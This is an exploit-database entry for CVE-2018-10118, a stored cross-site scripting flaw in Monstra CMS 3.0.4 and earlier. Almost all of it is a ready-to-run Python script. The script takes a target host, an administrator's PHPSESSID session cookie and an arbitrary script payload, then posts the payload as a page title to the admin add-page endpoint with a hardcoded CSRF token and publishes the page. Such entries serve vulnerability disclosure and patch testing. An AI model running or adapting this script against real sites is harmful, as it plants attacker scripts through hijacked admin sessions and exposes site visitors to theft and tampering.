Monstra CMS < 3.0.4 - Cross-Site Scripting



EKU-ID: 7673 CVE: 2018-10118 OSVDB-ID:
Author: DEEPIN2 Published: 2018-06-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Title: Monstra CMS < 3.0.4 - Cross-Site Scripting
# Date: 2018-06-07
# Author: DEEPIN2
# Software: Monstra CMS
# Version: 3.0.4 and earlier
# This automation code requires Python3
# You must intercept the first request through the proxy tool to verify the CSRF token.
 
import requests
import re
 
def runXSS(target, cookie, data):
    exploit = requests.post(target, cookies=cookie, data=data).text
    if re.search('exploit', exploit):
        return 'OK'
    else:
        return 'ERROR'
    
if __name__ == '__main__':
    print('''  ______     _______     ____   ___  _  ___        _  ___  _ _  ___
 / ___\ \   / / ____|   |___ \ / _ \/ |( _ )      / |/ _ \/ / |( _ )
| |    \ \ / /|  _| _____ __) | | | | |/ _ \ _____| | | | | | |/ _ `
| |___  \ V / | |__|_____/ __/| |_| | | (_) |_____| | |_| | | | (_) |
 \____|  \_/  |_____|   |_____|\___/|_|\___/      |_|\___/|_|_|\___/
    [*] Author : DEEPIN2(Junseo Lee)
---------------------------------------------------------------------''')
    print('[*] Ex) http://www.target.com -> www.target.com')
    url = input('Target : ')
    print('[*] Required admin\'s PHPSESSID.')
    PHPSESSID = input('PHPSESSID : ')
    pagename = input('Pagename : ')
    script = input('Script : ')
    target = 'http://' + url + '/admin/index.php?id=pages&action=add_page'
    cookie = {'PHPSESSID':PHPSESSID}
    data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\
            'page_title':script,\
            'page_name':pagename,\
            'page_meta_title':'',\
            'page_keywords':'',\
            'page_description':'',\
            'pages':0,\
            'templates':'index',\
            'status':'published',\
            'access':'public',\
            'editor':'',\
            'page_tags':'',\
            'add_page_and_exit':'Save+and+Exit',\
            'page_date':'9999-99-99'}
 
    result = runXSS(target, cookie, data)
    print('-' * 69)
    if result == 'OK':
        print('[+] LINK : http://' + url + '/' + pagename)
    else:
        print('[-] Error')